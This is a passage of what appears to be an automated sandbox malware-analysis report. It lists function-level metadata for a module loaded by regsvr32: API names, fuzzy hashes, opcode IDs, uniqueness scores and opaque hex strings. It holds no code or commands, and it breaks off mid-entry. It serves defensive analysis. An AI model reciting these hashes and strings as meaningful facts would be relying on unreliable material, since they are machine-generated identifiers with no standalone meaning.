                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f
                                                                                                                • API String ID: 3668304517-3861941003
                                                                                                                • Opcode ID: 0c9a84e2e3f632888bdd0b38296c30266ea54525b7cee448175e72687611b5ed
                                                                                                                • Instruction ID: dd044f3e2140998132ae7bea45da2fcdfeb7dc4e029f4aaab8ea46741afa481f
                                                                                                                • Opcode Fuzzy Hash: 0c9a84e2e3f632888bdd0b38296c30266ea54525b7cee448175e72687611b5ed
                                                                                                                • Instruction Fuzzy Hash: BEA182A2F1465194EF00DBB9D854BAC2231BB45BA8F845239DE6DA7BD9DFB8F045C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleInformationType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4064226416-0
                                                                                                                • Opcode ID: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
                                                                                                                • Instruction ID: c943f960c48cf721987a8ad62e3578949d37c114a416bae962b4915188c33b60
                                                                                                                • Opcode Fuzzy Hash: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
                                                                                                                • Instruction Fuzzy Hash: ED718162F08A4296FB64CBB6D454FAD23A1BB44788F844139DE0EA7A58DF78F44DC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseConnectErrorHandleLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1311304170-0
                                                                                                                • Opcode ID: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
                                                                                                                • Instruction ID: 61df400e63785a1609a3fbbf5d2a2494e63a8d5d84a805bf0ca02e6de4064ce6
                                                                                                                • Opcode Fuzzy Hash: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
                                                                                                                • Instruction Fuzzy Hash: 4D814FF2A08B4286EA10CF95E444B6DB361FB44B84F944139DB8E976A8DFBCF558C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ExistsFilePath
                                                                                                                • String ID: 2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4
                                                                                                                • API String ID: 1784296113-4103206974
                                                                                                                • Opcode ID: ab065dcdefc42338caf31267344cf4050606367dd2b4444a0ded6b75e13148f6
                                                                                                                • Instruction ID: c6856ac8dc1bbf0168f31807c66eaaf55f53baf9049a137e24de79acfc8a9d95
                                                                                                                • Opcode Fuzzy Hash: ab065dcdefc42338caf31267344cf4050606367dd2b4444a0ded6b75e13148f6
                                                                                                                • Instruction Fuzzy Hash: 78A199A2B1878181EF00DBA5D48579D6371FB847A4F845239EA5D67AEADFBCF085C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 8a7846ac665aaeed490fa70470950f5b4d74d6d24521f8cf68d5e25ee6ce012a
                                                                                                                • Instruction ID: 531fbd9d386f9d978a3ba18081c731f8902b0e30eba66559f5a375b9484e5d2f
                                                                                                                • Opcode Fuzzy Hash: 8a7846ac665aaeed490fa70470950f5b4d74d6d24521f8cf68d5e25ee6ce012a
                                                                                                                • Instruction Fuzzy Hash: A9C1C5A2A0868241EB61DB959444BBD6660FB41B80FCD0139DA4FA7792DFFCF49DC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CreateDirectoryFileNameSleepTemp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3305644664-0
                                                                                                                • Opcode ID: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
                                                                                                                • Instruction ID: 4af2431ed6a73ce670de5c207392c7096bdda6cc3a08a5404be6d21e1a1dfa48
                                                                                                                • Opcode Fuzzy Hash: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
                                                                                                                • Instruction Fuzzy Hash: 1A5197A2B14681D5EE00DBA9D49876C2321FB447B4F845639DA6EA7AD9DEBCF085C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D0131D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystemVersion
                                                                                                                • String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
                                                                                                                • API String ID: 2296905803-2598894011
                                                                                                                • Opcode ID: f71619cf61c237e0b8a079814423286223058618906bbb967bddd811f69ed572
                                                                                                                • Instruction ID: 4306f5c3dcda0262dd6f322863c0ad90cce15617cf3f0b94a8290942b8e85e42
                                                                                                                • Opcode Fuzzy Hash: f71619cf61c237e0b8a079814423286223058618906bbb967bddd811f69ed572
                                                                                                                • Instruction Fuzzy Hash: A441EA62A187C1C1E610DB65F48479EB361FB857D0F945139EA9D93AA9DFBCF088C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                • Opcode ID: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
                                                                                                                • Instruction ID: 9e3f41a4b2bbc2c9500a0c59252a1b1819c13f0fdf6b743f922511093c1960c8
                                                                                                                • Opcode Fuzzy Hash: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
                                                                                                                • Instruction Fuzzy Hash: 1331B862B1AA4195EE12DB939810BB523A4BF48B90F9D4539ED2E97780DFFCF448C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 23.02%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_invalid_parameter_noinfo$CloseHandle$FileType_get_daylight
                                                                                                                • String ID:
                                                                                                                • API String ID: 4200888154-0
                                                                                                                • Opcode ID: 6617301959b47138dd1b45bd65ee79e39aec94bb8f0fc5b15f299cb2837ceb1f
                                                                                                                • Instruction ID: c4645f2e8bb5aaf7d786515eee7663ec46177c8e4a47ff72dae6081312becabb
                                                                                                                • Opcode Fuzzy Hash: 6617301959b47138dd1b45bd65ee79e39aec94bb8f0fc5b15f299cb2837ceb1f
                                                                                                                • Instruction Fuzzy Hash: DDC1D477B14A4196EB10CFA8D480BAC3761FB48B98B944239DA1FA77D4DF78E45AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.36%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleView$CreateMappingUnmapWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 2825254369-0
                                                                                                                • Opcode ID: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
                                                                                                                • Instruction ID: 7883ebfe3e33d02e652e58a2d00d565cce48284aea80a7b56a4917c121382f71
                                                                                                                • Opcode Fuzzy Hash: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
                                                                                                                • Instruction Fuzzy Hash: F23181B271564186EB50CF66E810B2DB6E1FB88B94B594138DE4E93B14DF38F806C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 10.55%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
                                                                                                                • String ID: ?
                                                                                                                • API String ID: 428190724-1684325040
                                                                                                                • Opcode ID: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
                                                                                                                • Instruction ID: a889df6caa8f9e3fba165663fc295b29dc53c2c3d75788bee3ce9deaa34a9e38
                                                                                                                • Opcode Fuzzy Hash: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
                                                                                                                • Instruction Fuzzy Hash: 006192B2A1864285E710DFA1E840BA977A4FB44794FC81139EA4FD7A95DFBCF449C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 16.53%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$CloseErrorHandleLast
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 2157184327-3130406586
                                                                                                                • Opcode ID: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
                                                                                                                • Instruction ID: 9882730161ef733f9488a6eb8866ba6ebbf1d384fa5faee562bdb395b42a939e
                                                                                                                • Opcode Fuzzy Hash: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
                                                                                                                • Instruction Fuzzy Hash: 6311B462618B4186E751CB86F85472562A0FB48BE0F884238D95FD3B94CFBCE858C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                • String ID:
                                                                                                                • API String ID: 3936042273-0
                                                                                                                • Opcode ID: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
                                                                                                                • Instruction ID: 5873bd8d8bb457af74cc4520d6c8c59a8ae4b91db17c4e7ea87118f77181eaac
                                                                                                                • Opcode Fuzzy Hash: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
                                                                                                                • Instruction Fuzzy Hash: F79180B270578191EA04DF65E458B6D6366FB40F88FC84039DB4E97A69DFBCE498C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 2210144848-0
                                                                                                                • Opcode ID: f7acdf6c5f94f76698663367c7b515ae0103dc78b6a982193462834025627eb9
                                                                                                                • Instruction ID: 66fc4ca06fbb147f8e5f1063863a2bbb0c562bb7845b508beee3ae21b479e580
                                                                                                                • Opcode Fuzzy Hash: f7acdf6c5f94f76698663367c7b515ae0103dc78b6a982193462834025627eb9
                                                                                                                • Instruction Fuzzy Hash: 9581B1A2E1860295FB10DBE59440BBD66A2BB44784FC8413DDE0FB7691EFBCB45AC710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 5.54%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 60630809-0
                                                                                                                • Opcode ID: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
                                                                                                                • Instruction ID: 5237fb64868589723495b5d184495cb55b47da409ffffaba9b6ebbc67e82dd8a
                                                                                                                • Opcode Fuzzy Hash: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
                                                                                                                • Instruction Fuzzy Hash: 27317F72618B81C5D740CF65E440B6D77A5FB44B94FA40139EA8E83BA8EF79E449C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 6.12%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _set_statfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156100317-0
                                                                                                                • Opcode ID: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
                                                                                                                • Instruction ID: c3f81bd4caf3de5e211b132a46274af26835054fac48daf6f251f02b9ea57976
                                                                                                                • Opcode Fuzzy Hash: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
                                                                                                                • Instruction Fuzzy Hash: AE115BE2E58A0241FB64A1A4D855B7510807F55360F8D06BCED7FEA2DBCEECB88DC110
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.74%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452528299-0
                                                                                                                • Opcode ID: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
                                                                                                                • Instruction ID: 4c3c030742deb1216e470c3a81d9d91cd77a81ea6a7c3d30208314038188e3c6
                                                                                                                • Opcode Fuzzy Hash: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
                                                                                                                • Instruction Fuzzy Hash: 051199A1A0924241F911DBA2A400F3836517F44790F8D463CDD3FA77D5DEECB849C710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.29%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                • Opcode ID: 97b79303dd24eed3cd717ff4096d0d592d141e51ccfb295756824807d79b1970
                                                                                                                • Instruction ID: 9dae9d1df13ecf7ec9bc7fca28f50ba34a7724e8d483f667e84b41c783724ffa
                                                                                                                • Opcode Fuzzy Hash: 97b79303dd24eed3cd717ff4096d0d592d141e51ccfb295756824807d79b1970
                                                                                                                • Instruction Fuzzy Hash: 9C8183A3D0815285EF66DFAD9110B7826A0BB10744FDD803DDA0BF3285CAADF869D781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 4.01%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
